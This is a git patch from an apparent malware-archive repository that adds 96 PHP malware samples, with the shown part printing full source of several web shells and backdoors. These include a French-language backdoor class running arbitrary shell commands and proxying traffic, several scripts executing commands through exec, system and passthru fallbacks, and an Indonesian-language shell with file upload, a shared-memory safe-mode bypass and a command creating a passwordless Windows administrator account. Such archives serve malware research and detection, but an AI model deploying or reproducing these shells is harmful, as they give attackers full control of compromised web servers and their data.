From 23c136b0eb147d97667082b99eb36da56268ff40 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Fri, 9 Oct 2020 22:05:41 -0500 Subject: [PATCH] Add files via upload --- PHP/Backdoor.PHP.Agent.bf | 1 + PHP/Backdoor.PHP.Agent.bg | 181 +++ PHP/Backdoor.PHP.Agent.bh | 73 + PHP/Backdoor.PHP.Agent.bi | 72 + PHP/Backdoor.PHP.Agent.bj | 59 + PHP/Backdoor.PHP.Agent.bk | 50 + PHP/Backdoor.PHP.Agent.bl | 592 ++++++++ PHP/Backdoor.PHP.Agent.bn | 283 ++++ PHP/Backdoor.PHP.Agent.bo | 613 ++++++++ PHP/Backdoor.PHP.Agent.bq | 289 ++++ PHP/Backdoor.PHP.Agent.br | 939 ++++++++++++ PHP/Backdoor.PHP.Agent.bs | 76 + PHP/Backdoor.PHP.Agent.ca | 301 ++++ PHP/Backdoor.PHP.Agent.cb | 614 ++++++++ PHP/Backdoor.PHP.Agent.dy | 628 ++++++++ PHP/Backdoor.PHP.Agent.fo | 37 + PHP/Backdoor.PHP.Agent.m | 349 +++++ PHP/Backdoor.PHP.Small.u | 36 + PHP/Backdoor.PHP.Stnc.a | 168 +++ PHP/Backdoor.PHP.Stnc.b | 168 +++ PHP/Backdoor.PHP.TDshell.a | 1840 +++++++++++++++++++++++ PHP/Backdoor.PHP.WebShell.a | 810 ++++++++++ PHP/Backdoor.PHP.WebShell.aa | 23 + PHP/Backdoor.PHP.WebShell.ab | 3 + PHP/Backdoor.PHP.WebShell.ac | 3 + PHP/Backdoor.PHP.WebShell.ad | 180 +++ PHP/Backdoor.PHP.WebShell.ae | 513 +++++++ PHP/Backdoor.PHP.WebShell.af | 268 ++++ PHP/Backdoor.PHP.WebShell.b | 84 ++ PHP/Backdoor.PHP.WebShell.f | 214 +++ PHP/Backdoor.PHP.WebShell.k | 366 +++++ PHP/Backdoor.PHP.WebShell.u | 103 ++ PHP/Backdoor.PHP.WebShell.w | 730 ++++++++++ PHP/Backdoor.PHP.WebShell.y | 18 + PHP/Backdoor.PHP.WebShell.z | 17 + PHP/Backdoor.PHP.Zonie | 71 + PHP/Cythosia.7z | Bin 0 -> 226074 bytes PHP/Exploit.PHP.Deftool.a | 164 +++ PHP/Exploit.PHP.Inject.e | 98 ++ PHP/Exploit.PHP.Inject.h | 293 ++++ PHP/Exploit.PHP.Userpic.a | Bin 0 -> 7372 bytes PHP/Exploit.PHP.e | 503 +++++++ PHP/Flooder.PHP.MailSpam | 69 + PHP/HackTool.PHP.Botctl.a | 128 ++ PHP/HackTool.PHP.Brute.a | 81 + PHP/HackTool.PHP.Haxplorer.c | 2026 ++++++++++++++++++++++++++ PHP/HackTool.PHP.Iframer.a | 52 + PHP/HackTool.PHP.Mphak.b | 229 +++ PHP/HackTool.PHP.Mphak.c | 65 + PHP/HackTool.PHP.Mphak.e | 236 +++ PHP/HackTool.PHP.Small.f | 1 + PHP/HackTool.PHP.Zbot.a | 293 ++++ PHP/HackTool.PHP.Zunka.a | 279 ++++ PHP/IRC-Worm.PHP.Caracula | 8 + PHP/ProtonPHPWebPanel.7z | Bin 0 -> 3605176 bytes PHP/SpamTool.PHP.Massma.v | 266 ++++ PHP/Trojan-Downloader.PHP.Mulitcom.d | 90 ++ PHP/Trojan-Downloader.PHP.Small.c | 1 + PHP/Trojan-Downloader.PHP.Small.d | 1 + PHP/Trojan-Downloader.PHP.Small.e | 1 + PHP/Trojan-Downloader.PHP.Small.f | 9 + PHP/Trojan-Dropper.PHP.Agent.a | 156 ++ PHP/Trojan-Mailfinder.PHP.Massma.j | 183 +++ PHP/Trojan-Mailfinder.PHP.Massma.k | 242 +++ PHP/Trojan-Mailfinder.PHP.Massma.u | 210 +++ PHP/Trojan-Spy.PHP.PhPen.b | 659 +++++++++ PHP/Trojan-Spy.PHP.PhPen.d | 28 + PHP/Trojan-Spy.PHP.PhPen.e | 1440 ++++++++++++++++++ PHP/Trojan-Spy.PHP.PhPen.f | 1990 +++++++++++++++++++++++++ PHP/Trojan.PHP.Agent.a | 58 + PHP/Trojan.PHP.Agent.c | 1890 ++++++++++++++++++++++++ PHP/Trojan.PHP.Agent.d | 33 + PHP/Trojan.PHP.Io | 1 + PHP/Trojan.PHP.PHPInfo.a | 32 + PHP/Trojan.PHP.PHPInfo.c | 55 + PHP/Trojan.PHP.PHPInfo.e | 55 + PHP/Trojan.PHP.PHPInfo.g | 54 + PHP/Trojan.PHP.Sysbat | 79 + PHP/Trojan.PHP.Turame.d | 1 + PHP/Trojan.PHP.Zapchast.c | 25 + PHP/Virus.PHP.Alf | 81 + PHP/Virus.PHP.Aracn | 68 + PHP/Virus.PHP.Aristo.a | 65 + PHP/Virus.PHP.Feast | 80 + PHP/Virus.PHP.Feast.a | 31 + PHP/Virus.PHP.Indonesia | 35 + PHP/Virus.PHP.Neworld | 45 + PHP/Virus.PHP.Pirus | 29 + PHP/Virus.PHP.Pooks.a | 43 + PHP/Virus.PHP.Qwax | 92 ++ PHP/Virus.PHP.Rabow | 38 + PHP/Virus.PHP.Rabow.a | 128 ++ PHP/Virus.PHP.Rebber | 42 + PHP/Virus.PHP.Redz | 31 + PHP/Virus.PHP.Socrate.a | 174 +++ PHP/Virus.PHP.Virdrus | 44 + 96 files changed, 23882 insertions(+) create mode 100644 PHP/Backdoor.PHP.Agent.bf create mode 100644 PHP/Backdoor.PHP.Agent.bg create mode 100644 PHP/Backdoor.PHP.Agent.bh create mode 100644 PHP/Backdoor.PHP.Agent.bi create mode 100644 PHP/Backdoor.PHP.Agent.bj create mode 100644 PHP/Backdoor.PHP.Agent.bk create mode 100644 PHP/Backdoor.PHP.Agent.bl create mode 100644 PHP/Backdoor.PHP.Agent.bn create mode 100644 PHP/Backdoor.PHP.Agent.bo create mode 100644 PHP/Backdoor.PHP.Agent.bq create mode 100644 PHP/Backdoor.PHP.Agent.br create mode 100644 PHP/Backdoor.PHP.Agent.bs create mode 100644 PHP/Backdoor.PHP.Agent.ca create mode 100644 PHP/Backdoor.PHP.Agent.cb create mode 100644 PHP/Backdoor.PHP.Agent.dy create mode 100644 PHP/Backdoor.PHP.Agent.fo create mode 100644 PHP/Backdoor.PHP.Agent.m create mode 100644 PHP/Backdoor.PHP.Small.u create mode 100644 PHP/Backdoor.PHP.Stnc.a create mode 100644 PHP/Backdoor.PHP.Stnc.b create mode 100644 PHP/Backdoor.PHP.TDshell.a create mode 100644 PHP/Backdoor.PHP.WebShell.a create mode 100644 PHP/Backdoor.PHP.WebShell.aa create mode 100644 PHP/Backdoor.PHP.WebShell.ab create mode 100644 PHP/Backdoor.PHP.WebShell.ac create mode 100644 PHP/Backdoor.PHP.WebShell.ad create mode 100644 PHP/Backdoor.PHP.WebShell.ae create mode 100644 PHP/Backdoor.PHP.WebShell.af create mode 100644 PHP/Backdoor.PHP.WebShell.b create mode 100644 PHP/Backdoor.PHP.WebShell.f create mode 100644 PHP/Backdoor.PHP.WebShell.k create mode 100644 PHP/Backdoor.PHP.WebShell.u create mode 100644 PHP/Backdoor.PHP.WebShell.w create mode 100644 PHP/Backdoor.PHP.WebShell.y create mode 100644 PHP/Backdoor.PHP.WebShell.z create mode 100644 PHP/Backdoor.PHP.Zonie create mode 100644 PHP/Cythosia.7z create mode 100644 PHP/Exploit.PHP.Deftool.a create mode 100644 PHP/Exploit.PHP.Inject.e create mode 100644 PHP/Exploit.PHP.Inject.h create mode 100644 PHP/Exploit.PHP.Userpic.a create mode 100644 PHP/Exploit.PHP.e create mode 100644 PHP/Flooder.PHP.MailSpam create mode 100644 PHP/HackTool.PHP.Botctl.a create mode 100644 PHP/HackTool.PHP.Brute.a create mode 100644 PHP/HackTool.PHP.Haxplorer.c create mode 100644 PHP/HackTool.PHP.Iframer.a create mode 100644 PHP/HackTool.PHP.Mphak.b create mode 100644 PHP/HackTool.PHP.Mphak.c create mode 100644 PHP/HackTool.PHP.Mphak.e create mode 100644 PHP/HackTool.PHP.Small.f create mode 100644 PHP/HackTool.PHP.Zbot.a create mode 100644 PHP/HackTool.PHP.Zunka.a create mode 100644 PHP/IRC-Worm.PHP.Caracula create mode 100644 PHP/ProtonPHPWebPanel.7z create mode 100644 PHP/SpamTool.PHP.Massma.v create mode 100644 PHP/Trojan-Downloader.PHP.Mulitcom.d create mode 100644 PHP/Trojan-Downloader.PHP.Small.c create mode 100644 PHP/Trojan-Downloader.PHP.Small.d create mode 100644 PHP/Trojan-Downloader.PHP.Small.e create mode 100644 PHP/Trojan-Downloader.PHP.Small.f create mode 100644 PHP/Trojan-Dropper.PHP.Agent.a create mode 100644 PHP/Trojan-Mailfinder.PHP.Massma.j create mode 100644 PHP/Trojan-Mailfinder.PHP.Massma.k create mode 100644 PHP/Trojan-Mailfinder.PHP.Massma.u create mode 100644 PHP/Trojan-Spy.PHP.PhPen.b create mode 100644 PHP/Trojan-Spy.PHP.PhPen.d create mode 100644 PHP/Trojan-Spy.PHP.PhPen.e create mode 100644 PHP/Trojan-Spy.PHP.PhPen.f create mode 100644 PHP/Trojan.PHP.Agent.a create mode 100644 PHP/Trojan.PHP.Agent.c create mode 100644 PHP/Trojan.PHP.Agent.d create mode 100644 PHP/Trojan.PHP.Io create mode 100644 PHP/Trojan.PHP.PHPInfo.a create mode 100644 PHP/Trojan.PHP.PHPInfo.c create mode 100644 PHP/Trojan.PHP.PHPInfo.e create mode 100644 PHP/Trojan.PHP.PHPInfo.g create mode 100644 PHP/Trojan.PHP.Sysbat create mode 100644 PHP/Trojan.PHP.Turame.d create mode 100644 PHP/Trojan.PHP.Zapchast.c create mode 100644 PHP/Virus.PHP.Alf create mode 100644 PHP/Virus.PHP.Aracn create mode 100644 PHP/Virus.PHP.Aristo.a create mode 100644 PHP/Virus.PHP.Feast create mode 100644 PHP/Virus.PHP.Feast.a create mode 100644 PHP/Virus.PHP.Indonesia create mode 100644 PHP/Virus.PHP.Neworld create mode 100644 PHP/Virus.PHP.Pirus create mode 100644 PHP/Virus.PHP.Pooks.a create mode 100644 PHP/Virus.PHP.Qwax create mode 100644 PHP/Virus.PHP.Rabow create mode 100644 PHP/Virus.PHP.Rabow.a create mode 100644 PHP/Virus.PHP.Rebber create mode 100644 PHP/Virus.PHP.Redz create mode 100644 PHP/Virus.PHP.Socrate.a create mode 100644 PHP/Virus.PHP.Virdrus diff --git a/PHP/Backdoor.PHP.Agent.bf b/PHP/Backdoor.PHP.Agent.bf new file mode 100644 index 00000000..31723a31 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bf @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bg b/PHP/Backdoor.PHP.Agent.bg new file mode 100644 index 00000000..a09ba4b4 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bg @@ -0,0 +1,181 @@ +rep)) { + $dir = opendir($this->rep); + } else { + $dir = opendir($this->pwd); + } + while($f = readdir($dir)) { + if ($f !="." && $f != "..") { + $this->list[] = $f; + } + } + } + + function view() { + + $this->file = htmlentities(highlight_file($this->file)); + } + + function edit() { + if(!is_writable($this->edit)) { + echo "Ecriture impossible sur le fichier"; + } elseif(!file_exists($this->edit)) { + echo "Le fichier n'existe pas "; + } elseif(!$this->fichier) { + $fp = fopen($this->edit,"r"); + $a = ""; + while(!feof($fp)) { + $a .= fgets($fp,1024); + } + echo"
edit."\">
"; + } else { + $fp = fopen($this->edit,"w+"); + fwrite($fp, $this->fichier); + fclose($fp); + echo "Le fichier a été modifié"; + + } + } + + function del() { + if(is_file($this->del)) { + if(unlink($this->del)) { + echo "Fichier supprimé"; + } else { + echo "Vous n'avez pas les droits pour supprimer ce fichier"; + } + } else { + echo $this->del." n'est pas un fichier"; + } + } + + function shell() { + echo "

"; + system($this->shell); + } + + function proxy($host,$page) { + + $fp = fsockopen($host,80); + if (!$fp) { + echo "impossible d'etablir un connection avec l'host"; + } else { + $header = "GET ".$page." HTTP/1.1\r\n"; + $header .= "Host: ".$host."\r\n"; + $header .= "Connection: close\r\n\r\n"; + fputs($fp,$header); + while (!feof($fp)) { + $line = fgets($fp,1024); + echo $line; + } + fclose($fp); + } + } + + function ccopy($cfichier,$cdestination) { + if(!empty($cfichier) && !empty($cdestination)) { + copy($cfichier, $cdestination); + echo "Le fichier a été copié"; + } else { + echo "
Source:
Destination:
"; + } + } +} +if(!empty($_REQUEST['rep'])) { + $rep = $_REQUEST['rep']."/"; +} +$pwd = $_SERVER['SCRIPT_FILENAME']; +$pwd2 = explode("/",$pwd); +$file = $_REQUEST['file']; +$edit = $_REQUEST['edit']; +$fichier = $_POST['fichier']; +$del = $_REQUEST['del']; +$shell = $_REQUEST['shell']; +$proxy = $_REQUEST['proxy']; +$copy = $_REQUEST['copy']; +$cfichier = $_POST['cfichier']; +$cdestination = $_POST['cdestination']; + +$n = count($pwd2); +$n = $n - 1; +$pwd = ""; +for ($i = 0;$i != $n;$i = $i+1) { + $pwd .= "/".$pwd2[$i]; +} + +if($proxy) { +$host2 = explode("/",$proxy); +$n = count($host2); +$host = $host2[2]; +$page = ""; +for ($i = 3;$i != $n;$i = $i+1) { + $page .= "/".$host2[$i]; +} +echo $page; +} + +echo "Index of ".$pwd.""; +$backdoor = new backdoor(); +$backdoor->pwd = $pwd; +$backdoor->rep = $rep; +$backdoor->file = $file; +$backdoor->edit = $edit; +$backdoor->fichier = $fichier; +$backdoor->del = $del; +$backdoor->shell = $shell; +$backdoor->proxy = $proxy; +echo "
Index of ".$backdoor->pwd.""; +$backdoor->dir(); + +echo "
";
+echo "Executer un shell ";
+echo "Utiliser le serveur comme proxy ";
+echo "Copier un fichier 
";
+echo "\" Name                    Last modified       Size  Description";
+echo "
";
+
+if($file) {
+   $backdoor->view();   
+} elseif($edit) {
+   $backdoor->edit();
+} elseif($del) {   
+   $backdoor->del();
+} elseif($shell) {   
+   $backdoor->shell();
+}elseif($proxy) {
+   $backdoor->proxy($host,$page);
+}elseif($copy == 1) {
+   $backdoor->ccopy($cfichier,$cdestination);
+} else {
+   echo "[DIR] Parent Directory         ".date("r",realpath($rep."../"))."     - 
";
+   foreach ($backdoor->list as $key => $value) {
+      if(is_dir($rep.$value)) {
+         echo "[DIR]".$value."/                  ".date("r",filemtime($rep.$value))."      -  
";
+      } else {
+         echo "[FILE]".$value."  (edit) (del)          ".date("r",filemtime($rep.$value))."     1k  
";
+      }
+   }
+}
+echo "
"; +echo "
Coded By Charlichaplin
"; +echo ""; \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bh b/PHP/Backdoor.PHP.Agent.bh new file mode 100644 index 00000000..78384f8c --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bh @@ -0,0 +1,73 @@ +"; +$OS = @PHP_OS; +echo "OSTYPE:$OS
"; +$UNAME = @php_uname(); +echo "NAME:$UNAME
"; +$free = disk_free_space($dir); + +if ($free === FALSE) {$free = 0;} + +if ($free < 0) {$free = 0;} +echo "Free:".view_size($free)."
"; + +$cmd="id"; +$eseguicmd=ex($cmd); +echo $eseguicmd; + +function ex($cfe){ +$res = ''; +if (!empty($cfe)){ +if(function_exists('exec')){ +@exec($cfe,$res); +$res = join("\n",$res); +} +elseif(function_exists('shell_exec')){ +$res = @shell_exec($cfe); +} +elseif(function_exists('system')){ +@ob_start(); +@system($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(function_exists('passthru')){ +@ob_start(); +@passthru($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(@is_resource($f = @popen($cfe,"r"))){ +$res = ""; +while(!@feof($f)) { $res .= @fread($f,1024); } +@pclose($f); +}} +return $res; +} + +function view_size($size) + +{ + + if (!is_numeric($size)) {return FALSE;} + + else + + { + + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + + else {$size = $size . " B";} + + return $size; + + } + +} + +exit; \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bi b/PHP/Backdoor.PHP.Agent.bi new file mode 100644 index 00000000..2b586486 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bi @@ -0,0 +1,72 @@ +"; +$ker = @php_uname(); +$OS = @PHP_OS; +echo "OSTYPE:$OS
"; +echo "
Kernel:$ker
"; +$free = disk_free_space($dir); + +if ($free === FALSE) {$free = 0;} +if ($free < 0) {$free = 0;} +echo "Free:".view_size($free)."
"; + +$cmd="id"; +$eseguicmd=ex($cmd); +echo $eseguicmd; + +function ex($cfe){ +$res = ''; +if (!empty($cfe)){ +if(function_exists('exec')){ +@exec($cfe,$res); +$res = join("\n",$res); +} +elseif(function_exists('shell_exec')){ +$res = @shell_exec($cfe); +} +elseif(function_exists('system')){ +@ob_start(); +@system($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(function_exists('passthru')){ +@ob_start(); +@passthru($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(@is_resource($f = @popen($cfe,"r"))){ +$res = ""; +while(!@feof($f)) { $res .= @fread($f,1024); } +@pclose($f); +}} +return $res; +} + +function view_size($size) + +{ + + if (!is_numeric($size)) {return FALSE;} + + else + + { + + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + + else {$size = $size . " B";} + + return $size; + + } + +} + +exit; diff --git a/PHP/Backdoor.PHP.Agent.bj b/PHP/Backdoor.PHP.Agent.bj new file mode 100644 index 00000000..586cbf65 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bj @@ -0,0 +1,59 @@ +"; +$OS = @PHP_OS; +echo "
OSTYPE:$OS
"; +echo "
Kernel:$ker
"; +$free = disk_free_space($dir); +if ($free === FALSE) {$free = 0;} +if ($free < 0) {$free = 0;} +echo "Free:".view_size($free)."
"; +$cmd="id"; +$eseguicmd=ex($cmd); +echo $eseguicmd; +function ex($cfe){ +$res = ''; +if (!empty($cfe)){ +if(function_exists('exec')){ +@exec($cfe,$res); +$res = join("\n",$res); +} +elseif(function_exists('shell_exec')){ +$res = @shell_exec($cfe); +} +elseif(function_exists('system')){ +@ob_start(); +@system($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(function_exists('passthru')){ +@ob_start(); +@passthru($cfe); +$res = @ob_get_contents(); +@ob_end_clean(); +} +elseif(@is_resource($f = @popen($cfe,"r"))){ +$res = ""; +while(!@feof($f)) { $res .= @fread($f,1024); } +@pclose($f); +}} +return $res; +} +function view_size($size) +{ +if (!is_numeric($size)) {return FALSE;} +else +{ +if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} +elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} +elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} +else {$size = $size . " B";} +return $size; +} +} + +?> + + diff --git a/PHP/Backdoor.PHP.Agent.bk b/PHP/Backdoor.PHP.Agent.bk new file mode 100644 index 00000000..5a29414d --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bk @@ -0,0 +1,50 @@ + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bl b/PHP/Backdoor.PHP.Agent.bl new file mode 100644 index 00000000..f4e096fd --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bl @@ -0,0 +1,592 @@ + + + + + + +***BY PETERSON THE GREATEST CMD*** + + + +

--== by MS flood_ ==--

+OFF"; } + else { $SafeMode = "$SafeMode"; } + $btname = ''; + $bt = ''; + $dc = ''; + $newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup +"Administrators" /add Admin;net localgroup "Users" /del Admin'; + $bn = ''; +// Java Script + echo ""; + // End JavaScript + /* Functions */ + function cmd($CMDs) { + $CMD[1] = ''; + exec($CMDs, $CMD[1]); + if (empty($CMD[1])) { + $CMD[1] = shell_exec($CMDs); + } + elseif (empty($CMD[1])) { + $CMD[1] = passthru($CMDs); + } + elseif (empty($CMD[1])) { + $CMD[1] = system($CMDs); + } + elseif (empty($CMD[1])) { + $handle = popen($CMDs, 'r'); + while(!feof($handle)) { + $CMD[1][] .= fgets($handle); + } + pclose($handle); + } + return $CMD[1]; + } + +if (@$_GET['chdir']) { + $chdir = $_GET['chdir']; +} else { + $chdir = getcwd()."/"; + } +if (@chdir("$chdir")) { + $msg = " Pintu Masuk ke Direktori, OK!"; +} else { + $msg = "Error: Gagal masukkan ke folder!"; + $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']); +} + $chdir = str_replace(chr(92), chr(47), $chdir); +if (@$_GET['action'] == 'upload') { + $uploaddir = $chdir; + $uploadfile = $uploaddir. $_FILES['userfile']['name']; + if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . +$_FILES['userfile']['name'])) { + $msg = "{$_FILES['userfile']['name']}, Upload File Berjaya. +"; + } else { + $msg = "Error: Upload File Gagal."; + } +} +elseif (@$_GET['action'] == 'mkdir') { + $newdir = $_GET['newdir']; + if (@mkdir("$chdir"."$newdir")) { + $msg = "{$newdir}, folder +berhasil dibuat. "; + } else { + $msg = "Error: Pembuatan folder gagal."; + } +} +elseif (@$_GET['action'] == 'newfile') { + $newfile = $_GET['newfile']; + if (@touch("$chdir"."$newfile")) { + $msg = "{$newfile}, berhasil +dibuat! "; + } else { + $msg = "Error: Tak Boleh Buat File!"; + } +} +elseif (@$_GET['action'] == 'del') { + $file = $_GET['file']; $type = $_GET['type']; + if ($type == 'file') { + if (@unlink("$chdir"."$file")) { + $msg = "{$file}, Berhasil +menghapus arsip (file)!"; + } else { + $msg = "Error: Gagal menghapuskan File (file)!"; + } + } elseif ($type == 'dir') { + if (@rmdir("$chdir"."$file")) { + $msg = "{$file}, Berhasil +menghapus folder!"; + } else { + $msg = "Error: Gagal menghapuskan folder!"; + } + } +} +elseif (@$_GET['action'] == 'chmod') { + $file = $chdir.$_GET['file']; $chmod = $_GET['chmod']; + if (@chmod ("$file", $chmod)) { + + $msg = "Chmod dari {$_GET['file']} berubah menjadi +$chmod : Sukses!"; + } else { + $msg = 'Error: Gagal mengubah chmod.'; + } +} +elseif (@$_GET['action'] == 'rename') { + $file = $_GET['file']; $newname = $_GET['newname']; + if (@rename("$chdir"."$file", "$chdir"."$newname")) { + $msg = "Archive {$file} +named for {$newname} successfully!"; + } else { + $msg = "Error: Gagal menukar File."; + } +} +elseif (@$_GET['action'] == 'copy') { + $file = $chdir.$_GET['file']; $copy = $_GET['fcopy']; + if (@copy("$file", "$copy")) { + $msg = "{$file}, disalin +menjadi {$copy} +Berhasil!"; + } else { + $msg = "Error: Gagal menyalin {$file} menjadi {$copy}"; + } +} +/* Parte Atualiza 02:48 12/2/2006 */ +elseif (@$_GET['action'] == 'cmd') { + if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; } + if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; } + $cmd = stripslashes(trim($cmd)); + $result_arr = cmd($cmd); + + $afim = count($result_arr); $acom = 0; $msg = ''; + $msg .= "

Hasil : ".$cmd."

"; + if ($result_arr) { + while ($acom <= $afim) { + $msg .= "

".@$result_arr[$acom]."

"; + $acom++; + } + } + else { + $msg .= "

Error: Gagal Menjalankan perintah.

"; + } +} +elseif (@$_GET['action'] == 'safemode') { +if (@!extension_loaded('shmop')) { + echo "Loading... module
"; + if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) { + @dl('php_shmop.dll'); + } else { + @dl('shmop.so'); + } +} +if (@extension_loaded('shmop')) { + echo "Module: shmop loaded!
"; + $shm_id = @shmop_open(0xff2, "c", 0644, 100); + if (!$shm_id) { echo "Couldn't create shared memory segment\n"; } + $data="\x00"; + $offset=-3842685; + $shm_bytes_written = @shmop_write($shm_id, $data, $offset); + if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of +data\n"; } + if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; } + echo passthru("id"); + shmop_close($shm_id); + +} else { echo "Module: shmop tidak dimuat!
"; } +} +elseif (@$_GET['action'] == 'zipen') { + $file = $_GET['file']; + $zip = @zip_open("$chdir"."$file"); + $msg = ''; +if ($zip) { + while ($zip_entry = zip_read($zip)) { + $msg .= "Name: " . zip_entry_name($zip_entry) . "\n"; + $msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\n"; + $msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\n"; + $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n"; + if (zip_entry_open($zip, $zip_entry, "r")) { + echo "File Contents:\n"; + $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry)); + echo "$buf\n"; + zip_entry_close($zip_entry); + } + echo "\n"; + } + zip_close($zip); +} +} +elseif (@$_GET['action'] == 'edit') { + $file = $_GET['file']; + $conteudo = ''; + $filename = "$chdir"."$file"; + $conteudo = @file_get_contents($filename); + $conteudo = htmlspecialchars($conteudo); + $back = $_SERVER['HTTP_REFERER']; + echo "

Editing {$file} ...

"; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
"; + echo "
"; + echo "

"; + print "

"; + echo "

"; + echo " "; + echo " "; + echo "

"; + echo "
"; +} +elseif (@$_GET['action'] == 'save') { + $filename = "$chdir".$_GET['file']; + $somecontent = $_POST['S1']; + $somecontent = stripslashes(trim($somecontent)); + if (is_writable($filename)) { + @$handle = fopen ($filename, "w"); + @$fw = fwrite($handle, $somecontent); + @fclose($handle); + if ($handle && $fw) { + $msg = "{$_GET['file']}, berhasil diedit!"; + } + } else { + $msg = "{$_GET['file']}, tidak +bisa ditulisi!"; + } +} +// Informaçs + $cmdget = ''; + if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; } + if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; } + $cmdget = htmlspecialchars($cmdget); + function asdads() { + $asdads = ''; + if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; } + if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; } + if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; } + if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; } + if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; } + return $asdads; + } +echo "
"; +echo "
"; +echo "Informasi"; +echo "
"; +echo ""; +echo " "; +echo ""; +echo ""; +echo ""; +echo " "; +echo ""; +echo ""; +echo ""; +echo " "; +echo ""; +echo ""; + if (strtoupper(substr($OS, 0,3) != 'WIN')) { + $Methods = asdads(); + if ($Methods == '') { $Methods = "???"; } + echo ""; + echo " "; + echo ""; + echo ""; + } +echo ""; +echo " "; +echo ""; +echo ""; +echo ""; +echo " "; +echo ""; +echo ""; +echo "
"; +echo " Sistem : {$OS}
"; +echo " Nama : {$UNAME}
"; +echo " PHP : {$PHPv}, Safe Mode : {$SafeMode}
"; + echo "Methods : {$Methods}
"; +echo " IP : {$IpServer}
"; +echo " Perintah :

"; +echo "
"; +// Dir +echo "
"; +echo "
"; +if (is_writable("$chdir")) { + if (strtoupper(substr($OS, 0,3) == 'WIN')) { + echo "Dir YES: {$chdir} - Folder Baru | File Baru | Remote +Access"; + } else { + echo "Dir YES: {$chdir} - Folder Baru | File Baru | Kembali"; + } +} +else { +if (strtoupper(substr($OS, 0,3) == 'WIN')) { + echo "Dir NO: {$chdir} - Foldr Baru | File Baru | Remote +Access"; + } else { + echo "Dir NO: {$chdir} - Folder Baru | File Baru | Kembali +"; + } +} +if (@!$handle = opendir("$chdir")) { + echo " Gue gak bisa masuk folder, Klik sini! untuk Kembali ke folder ori!
"; +} +else { +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +} else { + echo "

$msg"; + } +echo "

"; +echo " "; +echo " "; +echo "
Upload:"; +echo " "; +echo "
"; +if (@!$msg) { + echo "

Messages

"; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +$colorn = 0; + while (false !== ($file = readdir($handle))) { + if ($file != '.') { + if ($colorn == 0) { + $color = "style=\"background-color: #FF9900\""; + } + elseif ($colorn == 1) { + $color = "style=\"background-color: #FFCC33\""; + } + if (@is_dir("$chdir"."$file")) { + $file = $file.'/'; + $mode = 'chdir'; + } else { + $mode = 'edit'; + } + if (@substr("$chdir", strlen($chdir) -1, 1) != '/') { + $chdir .= '/'; + } + if ($file == '../') { + $lenpath = strlen($chdir); $baras = 0; + for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } } + $chdir_ = explode("/", $chdir); + $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir); + } + $perms = @fileperms ("$chdir"."$file"); + if ($perms == '') { + $perms = '???'; + } + $size = @filesize ("$chdir"."$file"); + $size = $size / 1024; + $size = explode(".", $size); + if (@$size[1] != '') { + $size = $size[0].'.'.@substr("$size[1]", 0, 2); + } else { + $size = $size[0]; + } + if ($size == 0) { + if ($mode == 'chdir') { + $size = '???'; + } + } + echo ""; + echo ""; + if (@is_writable ("$chdir"."$file")) { + if ($mode == 'chdir') { + if ($file == '../') { + echo ""; + } else { + echo ""; + } + } else { + if (is_readable("$chdir"."$file")) { + echo ""; + } else { + echo ""; + } + } + } + else { + if ($mode == 'chdir') { + if ($file == '../') { + echo ""; + } else { + echo ""; + } + } else { + if (@is_readable("$chdir"."$file")) { + echo ""; + } else { + echo ""; + } + } + } + echo ""; + if ($mode == 'edit') { + echo ""; + } else { + echo ""; + } + echo ""; + if ($colorn == 0) { + $colorn = 1; + } 